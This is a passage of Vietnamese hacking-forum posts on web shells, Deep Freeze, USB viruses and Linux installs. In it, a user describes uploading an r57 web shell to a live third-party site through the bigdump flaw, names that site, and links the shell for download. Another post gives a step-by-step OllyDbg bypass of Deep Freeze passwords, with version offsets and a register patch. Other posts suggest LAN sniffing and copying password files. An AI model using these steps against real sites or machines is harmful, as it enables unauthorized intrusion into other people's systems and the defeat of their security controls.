|
|
cảm ơn bạn, mình chỉ muốn tìm hiểu xem lỗi phát sinh là do đâu và khắc phục
còn về vấn đề qeb sever riêng thì mình đang nghiên cứu, lãnh vực này hok có rành lắm, tại vì mình sắp có bài thi nên mới lấy đại web trên mạng "thí nghiệm", có gì các bác bỏ quá cho
|
|
|
mình chỉ up shell để học cách sử dụng nó, chức năng cũng như khả năng của nó thôi
mình ko hiểu là làm thế nào mà ko thể import shell vào db đc trong khi mình đã up đc shell lên host, làm thế nào để có thể import đc
đây là site bị lỗi dump, mình đã up đc con r57 lên đó nhưng khi import thì báo lỗi như trên, mình share ra đây cho các bác nghiên cứu nhưng mà import đc chớ có nghịch lung tung
http://www.cash4urgirl.net/bigdump.php
|
|
|
mình ko dám up vì sợ vi phạm nội quy
nếu bác nói vậy thì con shell đây
http://www.mediafire.com/download.php?iyczm5nmmmm
|
|
|
lợi dụng lỗi bigdump (đây là một lỗi cũ nhưng vẫn còn rất nhiều site dính) em đã up đc 1 con shell lên host nhưng khi import vào db thì lại báo lỗi:
Code:
Error at the line 42: $language='eng';
Query: <?php
/******************************************************************************************************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* www.R57.li - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
/* ??????:
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
/* ?? <a href="mailto:rst@void.ru">rst@void.ru</a>. ??? ??????????? ????? ???????????.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED
/******************************************************************************************************/
/* ~~~ ????????? | Options ~~~ */
// ????? ????? | Language
// $language='ru' - ??????? (russian)
// $language='eng' - english (??????????)
$language='eng';
MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
tại sao lại báo lỗi language, mong các anh chỉ giáo!!
em dùng con r57 và bigdump ver. 0.27b
|
|
|
Sao mà phải khổ vậy bạn. Theo mình biết thì password của deep freeze được lưu trong file $PERSI0.SYS (đối với phiên bản 6.0), PERSI0.SYS (đối với phiên bản 5.0), các phiên bản khác tương tự. Ta chỉ việc tới một máy chưa cài deep freeze, cài ra, copy file có chứa pass, về máy của mình và ghi đè là ổn.
Cách này mình vẫn chwa làm thwr nên không biết có dược hay không nữa (hi hi! he he!)
cách này lần trước mình có thử, thành công 100%, nhưng với phiên bản 6.0 thì chưa thử nhưng mình đoán là vẫn đc
|
|
|
bất khả thi
nhưng nếu có mạng thì có thể sniff qua LAN
|
|
|
hix, bạn có quyển nào thì up cho mình với
@PS: mà mình ko post bài ở đây thì post đi đâu
|
|
|
bạn xem kĩ lại USB xem, có thể trên USB có một công tắc nhỏ chống lại việc sao chép và sửa chữa dữ liệu trong USB đó, hiện nay có nhiều loại USB như vậy lắm
|
|
|
cái này là do trình quản lí USB Disk Security tạo ra nhằm ko cho virus tạo file autorun trong USB vì hầu như virus lây lan qua USB đều tạo ra 1 file autorun để người sử dụng ko để ý mà click đúp vào USB là dính ngay, tuy nhiên bạn có thể gỡ bỏ nó bằng cách sử dụng chính trình quản lí USB Disk Security 5.0 tại địa chỉ http://www.download.com.vn/Virus+Spyware+Malware+Trojan/Anti+Virus/Software-7430/
GOOD LUCK!!!
|
|
|
mình đang rất cần 1 quyển sách nói về socket, bạn nào biết quyển ebooks nào viết bằng tiếng Việt thì chỉ giùm với, mình search trên google mà hầu như ko có, mà có thì cũng chỉ toàn tiếng Anh ko àh!!!
|
|
|
con này mình từng bị dính rùi, ban mua đĩa super boot về rùi chạy cái Winmini PE trong đĩa, thực ra cái này là 1 miniWindows chạy trên đĩa, bạn cắm USB vô roài chạy cái miniPE xong mở ổ USB trong đó roài xóa 2 file autorun.inf và secret.exe đi là được.
Cách này cũng có thể diệt được hầu hết các loại virus lậy qua USB ngay cả khi máy bạn đã nhiễm chúng.
|
|
|
con này mình từng bị dính rùi, ban mua đĩa super boot về rùi chạy cái Winmini PE trong đĩa, thực ra cái này là 1 miniWindows chạy trên đĩa, bạn cắm USB vô roài chạy cái miniPE xong mở ổ USB trong đó roài xóa 2 file autorun.inf và secret.exe đi là được.
Cách này cũng có thể diệt được hầu hết các loại virus lậy qua USB ngay cả khi máy bạn đã nhiễm chúng.
|
|
|
Long_Tecole wrote:
Xin chào các bạn, mình là thành viên mới vào, nhưng cũng có 1 chút kinh nghiệm về USB, xin đựoc góp ý: trong trường hợp của bạn, mình đồng ý là máy tính của bạn không hề có virut, mà dù nếu có, chúng cũng không bao giờ chui vào USB, bởi vì USB là 1 vật trung chuyển, trong khi virut thì có nhu cầu xâm nhập vào Computer để phá hệ thống, ổ cứng....mình cho rằng, trong trường hợp này, USB của bạn vì đã truy cập vào khá nhiều trang wed có virut ẩn náu, nên bi nhiễm khá nặng, thành ra có thể vi mạch điện tử trong đó bi ăn mất khá nhiều, cách tốt nhất là nên ghost lại từ máy tính, vì mình có nghe thầy giáo mình nói phong phanh: " có thể dùng đĩa ghost đã được cài đặt sẵn để đi ghost các máy tính khác, đỡ tốn thời gian, tương tự, cũng có thể áp dụng cho USB ". Mong là có thể thành công..thân!..^_^[b]
Vius ăn cả vi mạch điện tử trong USB!! ==> Cái này mình mới nghe lần đầu đấy
|
|
|
bạn còn có thể dùng chương trình XCSHUTDOWN để tắt máy tính từ xa qua mạng LAN
http://download.freewarefiles.com/files/xcshutdown1.exe
|
|
|
lk wrote:
mình kiem dc cái này bạn coi thử xem sao
Phá DeepFreeze - Cướp lấy password của nó
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒
HƯỚNG DẪN CÁCH PHÁ DEEPFREE KHI QUÊN MẤT PASSWORD
I. LỜI KHUYẾN CÁO
Xin thưa với các bạn !
Hiện nay, trên giang hồ xuất hiện phần mềm UnDeepFree, đây là 1 phần mềm – theo tôi – có sức “tàn phá” kinh khủng …khiếp. Nó chẳng những làm hư DeepFree mà còn làm hư luôn hệ thống (system) của Windows.
Sau nhiều đêm mày mò, “ngâm kíu” các tài liệu. Cuối cùng tôi cũng tìm được cách phá DeepFree. Cách này đơn thuần chỉ là “cướp lấy” password để đăng nhập vào menu của DeepFree chứ không làm hư DeepFree và hệ thống windows. Nay mạn phép viết bài này để hướng dẫn.
Mục đích của tôi khi viết bài hướng dẫn này là chỉ muốn chia sẽ kinh nghệm mà mình đã học hỏi được. Vậy kính mong các bạn đừng áp dụng bài viết này với mục đích xấu, cài keylog, trojan… nhất là những người đang kinh doanh hàng net, họ thường hay sử dụng Deepfree để giảm thiểu tối đa khả năng bị hư máy và bị virus tấn công… Họ cũng có nỗi khổ riêng của họ.
Bạn chỉ nên sử dụng bài viết này với mục đích học hỏi, tốt nhất chỉ áp dụng cho máy nhà khi bạn lỡ quên password của DeepFree.
II. MỘT SỐ LƯU Ý TRƯỚC KHI TIẾN HÀNH PHÁ DEEPFREE
1. OllyDebug
Đầu tiên, bạn phải có công cụ OllyDebug. Đây là công cụ để dịch ngược file *.exe, *.dll về ngôn ngữ ASM. Nhưng tôi chọn và dùng nó để phá DeepFree mặc dù không dính dáng gì đến ngôn ngữ ASM.
OllyDebug hiện nay trên giang hồ là rất hiếm gặp. Nếu có gặp đi nữa thì nguyên bản này lại không có phần Plugins (chứa phần OllyScript, là phần chính để phá DeepFree, và phần Plugins lại càng hiếm gặp hơn cái OllyDebug đó nữa). Tôi phải bỏ ra thời gian hơn 1 tuần để tìm kiếm, nhưng chỉ tìm được phần mã nguồn của Plugins này, tôi phải nhờ 1 bạn trong diễn đàn (diendantinhoc.com) dịch hộ thành file thư viện.
Nhưng bạn đừng lo, nếu tôi đã viết bài hướng dẫn rồi thì cũng phải cung cấp công cụ chứ ?
Bạn có thể download OllyDebug tại địa chỉ dưới đây (nếu không tải được, bạn hãy liên hệ với tôi qua nick yahoohoo hoặc qua email):
===== >Click to download OllyDebug (4share.com) < =====
===== >Click to download Tutorial Huongdan < ===== (đây là bản tôi vừa cập nhật xong, nó thể hiện đầy đủ chi tiết hơn bài viết trên diễn đàn)
Sau khi bạn tải OllyDebug về, tiến hành giải nén và chạy file OllyDBG.exe để vào giao diện chính của OllyDebug. Bạn sẽ được giao diện như hình trên.
2. Vị trí biểu tượng của DeepFree trên thanh taskbar:
Bạn phải để ý vị trí của biểu tượng này, vì khi tiến hành phá DeepFree, sẽ có 1 biểu tượng DeepFree khác xuất hiện nằm kế bên. Bạn để ý nó để phân biệt đâu là biểu tượng cũ, và đâu là biểu tượng mới (xem hình)
Reduced: 84% of original size [ 607 x 37 ] - Click to view full image
3. Xem phiên bản của DeepFree mà máy đang dùng:
Để xem được phiên bản của DeepFree mà máy đang dùng, bạn hãy ấn phím tổ hợp CTRL + ALT + SHIFT + F6. Khi đó, menu nhập password của DeepFree sẽ hiển thị lên. Bạn nhìn vào góc trái, trên của menu này thì sẽ thấy phiên bản của nó.
Bạn hãy ghi nhớ số phiên bản này, đây là cơ sở để tìm offset phá DeepFree.
4. Tìm đường dẫn, thư mục cài đặt tệp FrzState2k.exe của DeepFree:
Thông thường, DeepFree được cài mặc định tại thư mục “ C:\Program Files\Faronics\Deep Freeze\Install C-0"
Trong thư mục này lại có chứa 1 tệp (DF5Serv.exe ) và 1 thư mục con ( _$Df ). Trong thư mục con lại chứa tệp FrzState2k.exe. Đây là tệp chính thức dùng để phá.
Túm lại, nó có đường dẫn đầy đủ như sau:
C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
Lưu ý: trên đây chỉ là 1 ví dụ về đường dẫn của tệp FrzState2k.exe. Nó có thể thay đổi tùy theo sự cài đặt của chủ máy.
III. TIẾN HÀNH PHÁ DEEPFREE
1. Dùng OllyDebug, mở tệp FrzState2k.exe:
Bạn hãy chạy tệp OllyDBG.exe để vào giao diện của OllyDebug. Sau đó bấm vào biểu tượng open trên thanh menu (hoặc bấm phím tắt F3, hoặc vào menu File\Open).
Trong hộp thọai Open này, bạn lần theo đường dẫn của tệp FrzState2k.exe (vừa tìm được trên mục II.4). Hãy nhập vào các mục của hộp thọai Open như sau (xem hình):
- File name: FrzState2k.exe
- Arguments: 1 106917 0 (lưu ý, có khoảng trắng)
Sau đó bấm open. OllyDebug sẽ hiển thị 1 hộp thọai thông báo khác, nội dung như sau:
---------------------------
Entry Point Alert
---------------------------
Module 'FrzState' has entry point outside the code (as specified in the PE header). Maybe this file is Self-extracting or self-modifying. Please keep it in mind when setting breakpoints!
---------------------------
Bạn cứ bấm OK.
Trong quá trình OllyDebug tiến hành dịch mã, có thể sẽ có lỗi xảy ra về modul như sau:
---------------------------
Compressed code?
---------------------------
Quick statistical test of module 'FrzState' reports that its code section is either compressed, encrypted, or contains large amount of embedded data. Results of code analysis can be very unreliable or simply wrong. Do you want to continue analysis?
---------------------------
Yes No
---------------------------
Trường hợp này bạn bấm YES. Hoặc:
---------------------------
Error
---------------------------
In module 'FrzState' OllyDbg encountered several corrupted breakpoints, where first byte of the actual command differs from that in the previous debugging session. This happens when program was recompiled or code is self-modifying (for example, self-extracting). For security reasons, OllyDbg will disable suspicious INT3 breakpoints. You can re-enable them in Breakpoints window.
---------------------------
OK
---------------------------
Trường hợp này bạn bấm OK.
2. Chạy Scripts, vào Plugins>>Script>>Run Script>>Load…
Như tôi đã nói ngay từ đầu, phần Spcript này chỉ có khi bạn đã plugins thư viện Script cho OllyDebug. Nếu chưa có, bạn hãy tìm file OllyScript.dll và plugins cho nó, nhớ xóa tệp Ollydbg.ini trong cùng thư mục của nó trước khi chạy OllyDBG.exe.
Khi OllyDebug dịch mã sang ASM xong, bạn bấm vào menu Plugins của OllyDebug. Chọn OllyScript>>Run script >> Load…
Lúc này, OllyDebug sẽ hiển thị hộp thọai Load lên, bạn chọn file "UPS.OSC". File này đã có sẵn trong thư mục đã bung OllyDebug.zip (như hình dưới)
Reduced: 90% of original size [ 563 x 419 ] - Click to view full image
Sau khi Script hòan tất. Bạn bấm OK. Bạn sẽ được Address mới trong Editor của OllyDebug.
Reduced: 91% of original size [ 558 x 462 ] - Click to view full image
3. Dịch chuyển đến vị trí Expression (ứng với từng phiên bản DeepFree thì vị trí này khác nhau)
Tiếp theo, bạn chuột phải lên bất kì vị trí nào của màn hình OllyDebug, chọn "Go to>>Expression" để dịch chuyển đến vị trí mới khác nữa. Thao tác này bạn có thể làm nhanh bằng cách ấn phím tổ hợp CTRL + G
Trong hộp thọai Goto (enter expression to follow), bạn gõ vào con số (hexa) tương ứng với từng phiên bản của DeepFree (phiên bản mà bạn xem được ở mục II.3 trên). Lần lượt, tôi sẽ đưa ra các con số tương ứng với từng phiên bản như sau:
Version ----> Hexa Number
4.20.020.0598 ----> 40368D
4.20.020.0604 ----> 40368D
4.20.021.0598 ----> 40368D
4.20.121.0613 ----> 4034F5
5.20.022.1125 ----> 4037E9
5.20.250.1125 ----> 408D34
5.30.021.1181 ----> 4037E9
5.30.150.1181 ----> 4037E9
5.50.021.1288 ----> 403860
Nếu bạn đang sử dụng DeepFree với 1 phiên bản khác (không thấy trong list trên) thì bạn có thể nhập lần lượt các Hexa Number trên để thử, cho đến khi nào được thì thôi.
Do tôi đang thực hành trên phiên bản 5.30.021.1181 nên tôi nhập vào con số 4037E9 (như hình sau)
Sau đó ấn OK. Tôi sẽ được OllyDebug đưa đến 1 vị trí mới trên "bảng xếp hạng" Address.
4. Xác định điểm breakpoint cho OllyDebug
Kế tiếp, bạn nhấn F2 - hoặc chuột phải vào vị trí goto vừa đến trên màn hình của OllyDebug, sau đó chọn BreakPoint>>Toggle - xác định điểm Break Point.
Nếu OllyDebug hiển thị hộp thọai xác nhận thì bạn bấm OK. Nội dung hộp thọai xác nhận như sau:
---------------------------
Suspicious breakpoint
---------------------------
It looks like you are trying to set breakpoint on the data. If this is really the case, such breakpoint will not execute and may have disastrous influence on the debugged program. Do you really want to set breakpoint here?
---------------------------
Yes No
---------------------------
5. Test lần thứ 1 chương trình FrzState2k.exe
Khi có được vị trí BreakPoint rồi, bạn ấn F9 (hoặc vào menu Debug>>Run) để tiến hành test lần thứ 1 chương trình FrzState2k.exe
Sau khi OllyDebug test xong. Sẽ có 1 biểu tượng DeepFree mới (new icon) xuất hiện dưới taskbar của bạn, biểu tượng này nằm tại vị trí thứ 1 kể từ bên trái sang.
Reduced: 97% of original size [ 525 x 61 ] - Click to view full image
Bạn hãy phân biệt cái biểu tượng mới (new icon) này so với cái biểu tượng cũ (old icon) mà ta đã để ý ở phần II.2 trên.
6. Mở hộp thọai nhập password của new icon
Để mở hộp thọai password của biểu tượng thứ 2 này, ta không thể nào dùng phím tổ hợp CTRL + ALT + SHIFT + F6, vì nếu vậy thì máy tính sẽ lầm tưởng ta mở hộp thọai password của biểu tượng thứ 1 (old icon). Ta hãy dùng chuột để mở password của cái new icon này. Bạn hãy bấm tổ hợp phím CTRL + ALT + SHIFT, sau đó nhấp kép chuột trái vào biểu tượng mới (new icon).
Khi hộp thọai nhập password hiển thị, bạn nhập vào đó một chuỗi kí tự bất kì để làm password. Xong ấn OK. Hộp thọai password này không mất đi mà nó vẫn còn hiển thị trên màn hình (bạn chịu khó nhé, đừng bao giờ tắt nó – mà tắt cũng hổng được trừ khi bạn tắt OllyDebug). Sau khi nhập password xong, OllyDebug sẽ lần lượt đưa bạn đến các vị trí khó tìm ( khó tìm trong các thủ thuật mò password khác).
Khi này, nếu thấy chữ "Pause" màu đỏ nền vàng hiển thị phía dưới, góc phải của OllyDebug. Bạn hãy bấm F8 để OllyDebug tiếp tục gọi các function khác. Có thể trong quá trình gọi function, OllyDebug sẽ hiển thị hộp thọai breakpoint. Nội dung hộp thọai như sau:
---------------------------
Suspicious breakpoint
---------------------------
It looks like you are trying to set breakpoint on the data. If this is really the case, such breakpoint will not execute and may have disastrous influence on the debugged program. Do you really want to set breakpoint here?
---------------------------
Yes No
---------------------------
Bạn hãy bấm YES.
Lặp lại các thao tác trên cho đến khi nào trên thanh Registers của OllyDebug hiển thị:
Registers
EAX 00000000
ECX 00000001
EDX 0012FB80
EBX 009D5610
ESP 0012FB70 Xem hình dưới:
7. Thay đổi giá trị thanh ghi AX (tương ứng là EAX trong OnlyDebug)
Bạn hãy chú ý vị trí thanh AX, giá trị của thanh này hiện giờ là 0. Bạn hãy bấm kép vào vị trí EAX này để OllyDebug hiển thị hộp thọai chỉnh sửa giá trị. Bạn nhập vào đó giá trị 1
Xong nhấn OK.
8. Đăng nhập vào hộp thọai Boot Control của DeepFree – hòan tất quá trình phá DeepFree
Khi thay đổi giá trị của thanh AX xong. Bạn tiếp tục F9 (hoặc vào menu Debug>>Run) để OllyDebug test lần 2 với giá trị AX vừa mới nhập này. Và cái điều gì đã xảy ra sau đó ????
Công đọan tiếp theo là gì, đó là tùy vào mục đích của bạn. Bạn có thể chọn Boot Thawed on next, hoặc Boot Thawed để mở phá băng. Sau đó restart lại máy.
Lần sau, tôi sẽ giới thiệu với các bạn công đọan phá băng – cài chương trình vào máy – đóng phá băng mà không cần phải restart lại máy tính. Hãy chờ chút xíu nhé.
Xem thêm:
===> Tuyệt Chiêu Tự Mò Offset Để Crack Phần Mềm
===> Tuyệt chiêu tự mò tìm seri@l cho phần mềm
------------------------------ OK. LovePascal -
---------email: h_huynhphong@yahoo.com -
----------------------- http://windows.site.io/ -
Cập nhật OllyDebug vào 10/02/2007
OllyDebug bản được gọi là hoàn chỉnh nhất và được tôi up lên host:
http://www.4shared.com/file/10368974/16cd445b/OnlyDebug_day_du_.html
Bạn download tại địa chỉ đó nhé.
--------------------
Dùng ProcessExplorer để tìm Command Line và địa chỉ Arguments
Cập nhật phương pháp để đối phó với DeepFree 6.0 trở lên (DeepFree chạy ẩn)
Hiện nay, các phiên bản DeepFree 6.0 trở lên có tích hợp thêm 1 "tuyệt chiêu" mới nhằm đối phó với các trường hợp quấy rối. Đó là nó không hiển thị Icon (dưới taskbar), không cho mở bằng tổ hợp phím cố định. Và đặc biệt, nó lại dấu cả đường dẫn cài đặt, thay đổi địa chỉ Arguments...
Trong bài viết trên, tôi giới thiệu cho các bạn cái địa chỉ Arguments: 1 106917 0 (phần III. 1) dùng cho OllyDebug để đối phó với các DeepFree phiên bản dưới 6.
Thế nhưng, đối với các phiên bản DeepFree version 6.0 trở lên thì cái địa chỉ này có thể không còn đúng nữa. Nếu thực tế là như vậy, chẳng lẽ là "pó tay" ? Không sao, bạn có thể dùng chương trình ProcessExplorer để tìm cái địa chỉ Arguments mới.
===> Download ProcessExplorer here <====
(Nếu không download được, bạn hãy vào trang chủ đễ tìm ProcessExplorer, hoặc liên hệ với tôi để lấy bản này).
Chú ý: Khi bạn có trong tay bản ProcessExplorer thì bạn sẽ mò được:
Arguments của tất cả các phiên bản DeepFree.
Đường dẫn cài đặt (command line) tệp FrzState2k.exe - Bạn khỏi làm bước II.4 của bài viết trên
Bạn tại về file ProcessExplorer.zip, giải nén và chạy nó. Sau khi vào giao diện chính của ProcessExplorer, bạn chuột phải vào cái program FrzState2k.exe đang chạy, chọn properties, trong hộp thoại hiển thị, tại ô command line, bạn sẽ thấy bao gồm đường dẫn thư mục của file FrzState2k.exe, cuối đường dẫn này có địa chỉ Arguments của DeepFree (xem hình)
Reduced: 85% of original size [ 599 x 498 ] - Click to view full image
Hình: Giao diện của ProcessExplorer
Hình: Command Line và Arguments của DeepFree
Cái này hình như có trên diễn đàn rùi mà, bài này là của bác lovepascal đã post lâu roài bạn replay lại làm gì
Code:
/hvaonline/posts/list/7044.html
|
|
|
StarGhost wrote:
tuananh2310 wrote:
mình dùng bản việt hóa nên nó thông báo là không có việc phải làm với <install> hoặc
không có việc phải làm với <install-sh>
vậy đó !!!
bạn có thể down chúng về cài thử rồi hướng dẫn mình được ko ???
Thế tức là install được rồi còn gì nữa. Chạy lần đầu thì nó sẽ make, rồi sau đó sẽ install. Chạy lần hai thì nó không còn gì để làm nữa nên nói thế, có gì lạ đâu. Bây giờ chỉ việc dùng thôi, còn dùng như thế nào thì đọc manual đi.
Nói như bạn thì có nghĩa là sau khi configure thì sẽ tự động install ah ???
|
|
|
mình dùng bản việt hóa nên nó thông báo là không có việc phải làm với <install> hoặc
không có việc phải làm với <install-sh>
vậy đó !!!
bạn có thể down chúng về cài thử rồi hướng dẫn mình được ko ???
|
|
|
hix! hiện nay em có 1 soft làm giao diện cho Linux rất hay mà ko biết cách cài, ai chỉ dùm em với
em download soft đó tại http://www.beryl-project.org/releases.php đã giải nén và configure được rùi nhưng khi
make install hoặc make install-sh
thì lại ko được, nó toàn báo là ko có việc phải làm với nó, em ko hiểu tại sao lại ko make để install được
ai giúp em với, em dùng Linux Fedora Core 7
hic!! em ko bít cách copy dòng lệnh từ bảng console nên chỉ còn cách post hình lên thui. Mọi người thông cảm nhé
nó báo ko có file để make mà rõ ràng trong thư muc đó em tìm được 2 file là makefile.am và makefile.in
|
|
|
cảm ơn bạn nhé máy mình ổn rùi
hic mình xóa hết file của DAEMONTools là lại chạy ngon lành hic chả biết bị bệnh gì từ giờ mình chỉ dám dùng A120% thui ko dùng DAEMOONTools nữa dễ chết lém
|
|
|
hum trước mình có ra mạng down cái soft DAEMONTools (chương trình tạo ổ ảo) về xài nhưng khi cài xong thì thôi rồi cái com-pu-tơ nhà mình tự nhiên chạy chậm đừng hỏi lun. Refresh máy thì ko sao nhưng khi click vào My Computer hay bất cứ biểu tượng nào trên nền Desktop thì máy chậm rì rì, tất cả các chương trình chạy sau đó đều Not Responding .... Thêm nữa mình tắt máy thì rất là lâu có khi chờ đến 6 phút mà nó chưa tắt được thế là mình chỉ còn cách rút nguồn ra !!!hic...hic...hic
Mình vào safe Mode rùi đăng nhập với tài khoản admin thì máy chạy ngon lành, quét virus trong đó thì không được con nào mà restart lại thì vẫn bị, hic..., chỉ có mỗi acc admin thì ko bị thui
vậy có phải là do virus ko các bạn???
chỉ mình cách diệt với!!!
|
|
|
ủa ko con` gì trong ổ cứng thì làm sao có Window mà chạy ????
|
|
|
thanks bạn votinh236 nhé!!!
mình tìm đc rùi
|
|
|
Sao ko ai trả lời mình vậy!!!
cái này áp dụng tương tự cho Norton Goback 4.0 đc ko vậy ???
hic!!! post bài lâu wa rùi mà chẳng ai chịu trả lời mình cả
|
|
|
Trời !!!
như vậy thì mình làm sao hỉu được cơ chứ
I'am newbie
|
|
|
|
|
|
|